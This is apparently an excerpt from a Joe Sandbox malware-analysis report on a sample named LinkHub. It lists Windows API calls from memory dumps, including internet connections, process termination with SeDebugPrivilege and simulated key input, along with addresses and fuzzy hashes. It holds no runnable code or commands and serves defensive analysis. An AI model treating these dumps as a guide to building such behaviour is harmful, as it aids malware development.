                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D5CB8
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D5CEB
                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 002D5D25
                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 002D5D34
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                    • String ID:
                                                                    • API String ID: 3210457359-0
                                                                    • Opcode ID: 1b1e02b5be62c46ed36719112235fface18ef3dd6740236d88a4745cc55386f3
                                                                    • Instruction ID: 87b4cc1e3259a1ff709e23d373eb550ffb9256decbcbb46df15b48ca664521d8
                                                                    • Opcode Fuzzy Hash: 1b1e02b5be62c46ed36719112235fface18ef3dd6740236d88a4745cc55386f3
                                                                    • Instruction Fuzzy Hash: 72519F30A71A29AFEF249F14CC49B987B66AB04754F108113F6159A2E0C7F5ADB09B51
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002BCBC7
                                                                    • GetLastError.KERNEL32 ref: 002BCBDA
                                                                    • SetEvent.KERNEL32(?), ref: 002BCBEE
                                                                      • Part of subcall function 002BCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002BCCB7
                                                                      • Part of subcall function 002BCC98: GetLastError.KERNEL32 ref: 002BCD67
                                                                      • Part of subcall function 002BCC98: SetEvent.KERNEL32(?), ref: 002BCD7B
                                                                      • Part of subcall function 002BCC98: InternetCloseHandle.WININET(00000000), ref: 002BCD86
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 337547030-0
                                                                    • Opcode ID: b2688efd15aa1496d5719aeffb3b826665f532f5dc661145f430282f244447dd
                                                                    • Instruction ID: d967d37f935bd7475ec9800729ba8c584c995c0828ac6f36af60cba5a59d50f7
                                                                    • Opcode Fuzzy Hash: b2688efd15aa1496d5719aeffb3b826665f532f5dc661145f430282f244447dd
                                                                    • Instruction Fuzzy Hash: 4E319E71611B01AFDB219F75DD48ABABBF8FF54384B20452EF95A82610C731E824AB60
                                                                    APIs
                                                                      • Part of subcall function 002A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002A43AD
                                                                      • Part of subcall function 002A4393: GetCurrentThreadId.KERNEL32 ref: 002A43B4
                                                                      • Part of subcall function 002A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002A2F00), ref: 002A43BB
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A2F0A
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002A2F28
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002A2F2C
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A2F36
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002A2F4E
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002A2F52
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A2F5C
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002A2F70
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002A2F74
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: f02f7ed944bb0fc2d2905e182ebb950b467fc8d17bac8e08359179593389f75f
                                                                    • Instruction ID: e8f50180676bc1b9a23ec45bf5157a852f2aa3b11eab085d932dec37477f8ade
                                                                    • Opcode Fuzzy Hash: f02f7ed944bb0fc2d2905e182ebb950b467fc8d17bac8e08359179593389f75f
                                                                    • Instruction Fuzzy Hash: 5701D830794610BBFB106768AC8EF593F5DDB4EB11F100052F318AE1E0CDE198548EA9
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002A1D95,?,?,00000000), ref: 002A2159
                                                                    • HeapAlloc.KERNEL32(00000000,?,002A1D95,?,?,00000000), ref: 002A2160
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A1D95,?,?,00000000), ref: 002A2175
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,002A1D95,?,?,00000000), ref: 002A217D
                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A1D95,?,?,00000000), ref: 002A2180
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A1D95,?,?,00000000), ref: 002A2190
                                                                    • GetCurrentProcess.KERNEL32(002A1D95,00000000,?,002A1D95,?,?,00000000), ref: 002A2198
                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A1D95,?,?,00000000), ref: 002A219B
                                                                    • CreateThread.KERNEL32(00000000,00000000,002A21C1,00000000,00000000,00000000), ref: 002A21B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 15d71fb5470e1490d31ad26bc0c122100d4e84f0bacfc76bf3adc752be657bf3
                                                                    • Instruction ID: 2562094329f5451e4e3909916439f1a4bef9f5441dc48264630120df045291af
                                                                    • Opcode Fuzzy Hash: 15d71fb5470e1490d31ad26bc0c122100d4e84f0bacfc76bf3adc752be657bf3
                                                                    • Instruction Fuzzy Hash: B801A8B5641744BFE710ABA5EC4DF6B7BACEB89711F004412FA09DB1A1CA70DC04CA20
                                                                    APIs
                                                                      • Part of subcall function 002441EA: _wcslen.LIBCMT ref: 002441EF
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002ACF99
                                                                    • _wcslen.LIBCMT ref: 002ACFE0
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002AD047
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002AD075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                    • String ID: ,*1$0$<*1
                                                                    • API String ID: 1227352736-3857097288
                                                                    • Opcode ID: 2a53f9a4d564a020dbcbecaa6cb83cfac211c1c31a9f464497b7f772ce7f0745
                                                                    • Instruction ID: 927fc8ccec888cdcb10862b8dbd9e1fe4e30d0fd020a2f0641ea518507d8aa60
                                                                    • Opcode Fuzzy Hash: 2a53f9a4d564a020dbcbecaa6cb83cfac211c1c31a9f464497b7f772ce7f0745
                                                                    • Instruction Fuzzy Hash: 1751E2716343029FD715AF28C845B6FB7E8AF4A314F040A2AF996D35A0DFB0CD658B52
                                                                    APIs
                                                                      • Part of subcall function 002ADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 002ADDAC
                                                                      • Part of subcall function 002ADD87: Process32FirstW.KERNEL32(00000000,?), ref: 002ADDBA
                                                                      • Part of subcall function 002ADD87: CloseHandle.KERNELBASE(00000000), ref: 002ADE87
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CABCA
                                                                    • GetLastError.KERNEL32 ref: 002CABDD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CAC10
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 002CACC5
                                                                    • GetLastError.KERNEL32(00000000), ref: 002CACD0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CAD21
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: c3086d7412ec854a1088f88048e8065174fd135667f370893cb5b366151aa84e
                                                                    • Instruction ID: 7ad2014c64cc99be2d67f42f663c2eb9b616c5581ecadbeed1b540c19dc7ab19
                                                                    • Opcode Fuzzy Hash: c3086d7412ec854a1088f88048e8065174fd135667f370893cb5b366151aa84e
                                                                    • Instruction Fuzzy Hash: E561DD30224606AFD314DF18C488F25BBE0AF5430CF15858DE46A8BBA3C771ED55CB92
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D43C1
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002D43D6
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D43F0
                                                                    • _wcslen.LIBCMT ref: 002D4435
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 002D4462
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D4490
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcslen
                                                                    • String ID: SysListView32
                                                                    • API String ID: 2147712094-78025650
                                                                    • Opcode ID: cacee2221a2985231c1f9bb0a24ccfd3e2ab384dabb8a33d8f8f7b374a5c615c
                                                                    • Instruction ID: 265e14b3469c31b1676bba6d97629f5e9bcb3b969493a18050ecc1563fc60d0d
                                                                    • Opcode Fuzzy Hash: cacee2221a2985231c1f9bb0a24ccfd3e2ab384dabb8a33d8f8f7b374a5c615c
                                                                    • Instruction Fuzzy Hash: 2341B171910309ABDF21AF64CC49BEA7BA9FF48350F100167F958E7291D7709DA0CB90
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002AC6C4
                                                                    • IsMenu.USER32(00000000), ref: 002AC6E4
                                                                    • CreatePopupMenu.USER32 ref: 002AC71A
                                                                    • GetMenuItemCount.USER32(01865150), ref: 002AC76B
                                                                    • InsertMenuItemW.USER32(01865150,?,00000001,00000030), ref: 002AC793
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: 1c37764b1e346f04749609913ea8384ae8d09de5ed20f35ff4f089d365d93fc8
                                                                    • Instruction ID: 94d4adba90486fe473be27e4dcd4a581eb2fda532f1a7e904bb74793652b5f7c
                                                                    • Opcode Fuzzy Hash: 1c37764b1e346f04749609913ea8384ae8d09de5ed20f35ff4f089d365d93fc8
                                                                    • Instruction Fuzzy Hash: 50519E70A102069BDF10CF68DD88BAEFBFCAF4A314F34415AE91297291DB709964CF61
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 002419E1
                                                                    • ScreenToClient.USER32(00000000,?), ref: 002419FE
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00241A23
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00241A3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID: $'$$$'$
                                                                    • API String ID: 4210589936-2124742234
                                                                    • Opcode ID: 4f3b0cf9e8f506d28c8f4989a7bad4a5713846d8b6e54a7a446a3b3aaf074e7a
                                                                    • Instruction ID: 76b0116f4284b6571f490a94de01a69f212f8a4c8e9968c6438bbf489b3fc375
                                                                    • Opcode Fuzzy Hash: 4f3b0cf9e8f506d28c8f4989a7bad4a5713846d8b6e54a7a446a3b3aaf074e7a
                                                                    • Instruction Fuzzy Hash: B2418E75A1551AFADF09EF64C848AEEB774FF05724F208216E429A22D0C7306EA0CB91
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • BeginPaint.USER32(?,?,?), ref: 00241B35
                                                                    • GetWindowRect.USER32(?,?), ref: 00241B99
                                                                    • ScreenToClient.USER32(?,?), ref: 00241BB6
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00241BC7
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00241C15
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00283287
                                                                      • Part of subcall function 00241C2D: BeginPath.GDI32(00000000), ref: 00241C4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                    • String ID: (1
                                                                    • API String ID: 3050599898-3903994380
                                                                    • Opcode ID: 80145181a636c1da4cc3a245ac83fc7a6462c5cc80ba40fa571896c7c3df9956
                                                                    • Instruction ID: 874c8cdf753d3f9aeb8c3c5005e28031819f2b5c2fb19a581c99afc274bbdc18
                                                                    • Opcode Fuzzy Hash: 80145181a636c1da4cc3a245ac83fc7a6462c5cc80ba40fa571896c7c3df9956
                                                                    • Instruction Fuzzy Hash: DC41E230615301AFC711DF28DC84FB77BA8EB49724F040229F9548A1E1C7709CB4DB62
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D8740
                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 002D8765
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002D877D
                                                                    • GetSystemMetrics.USER32(00000004), ref: 002D87A6
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002BC1F2,00000000), ref: 002D87C6
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • GetSystemMetrics.USER32(00000004), ref: 002D87B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID: (1
                                                                    • API String ID: 2294984445-3903994380
                                                                    • Opcode ID: 64d33f611fbe2a58e76af24ad854c10eb0eacf8c145e729ed03abdf29f31a2b2
                                                                    • Instruction ID: 4d8725cd3def5fc9d095250099c7331cf7d669f7958972b3bc65e1e354ee7592
                                                                    • Opcode Fuzzy Hash: 64d33f611fbe2a58e76af24ad854c10eb0eacf8c145e729ed03abdf29f31a2b2
                                                                    • Instruction Fuzzy Hash: 9A21A475A21242DFDB145F38DC08A6AB7A5FB44325F25462AF926D22E0EF709C60CB50
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 002AD1BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 5d8b4831c367ba9f369c765958a404dd659bd0bbd24ae793747411b20fbc81c8
                                                                    • Instruction ID: 4b5a6895ab8b7406f9c5d721b760234405a4b8cbd9c4849efaf69f8ab08b1960
                                                                    • Opcode Fuzzy Hash: 5d8b4831c367ba9f369c765958a404dd659bd0bbd24ae793747411b20fbc81c8
                                                                    • Instruction Fuzzy Hash: F6110A31A7D307BBE7055F14DC82DBE779C9F06B60B20002AF50AA65C1DFF06E504560
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 642191829-3771769585
                                                                    • Opcode ID: 3638e0d5cc96a6947d880c9c0815d065a5fbd30f9e9f2e57f398b706a9279e74
                                                                    • Instruction ID: da6ab224bb84c34dc4d080e024983ed6715bfec485b799dfb476bbd261dd65a7
                                                                    • Opcode Fuzzy Hash: 3638e0d5cc96a6947d880c9c0815d065a5fbd30f9e9f2e57f398b706a9279e74
                                                                    • Instruction Fuzzy Hash: 5711B431921115BBDF20BB70EC4AEDAB7ACDF06710F0101A6F545A6091EEB49E92DA61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 952045576-0
                                                                    • Opcode ID: c1e53bb5154d6ceed37971ca9094a744bc940040f751a7c6cebe15f1ab024b0f
                                                                    • Instruction ID: 41eb636de2aac2b19baf999064f07cdb2b38f3930d04c220bfdbc61964d7a936
                                                                    • Opcode Fuzzy Hash: c1e53bb5154d6ceed37971ca9094a744bc940040f751a7c6cebe15f1ab024b0f
                                                                    • Instruction Fuzzy Hash: FD418365D2121876CB51FBF8DC8AACFB76CAF05310F508462E518E3161FA38D2B5C7A6
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 002D37B7
                                                                    • GetDC.USER32(00000000), ref: 002D37BF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D37CA
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002D37D6
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D3812
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D3823
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D6504,?,?,000000FF,00000000,?,000000FF,?), ref: 002D385E
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D387D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 18c0c879ea99af5b8efc0c9b2b4c06d09f984c4cc7eab5ccaa9ae8aa9804ae7c
                                                                    • Instruction ID: 5e0465a34319bebc98eba71eea9709a38154956efa60eb812a19b18b9f17e990
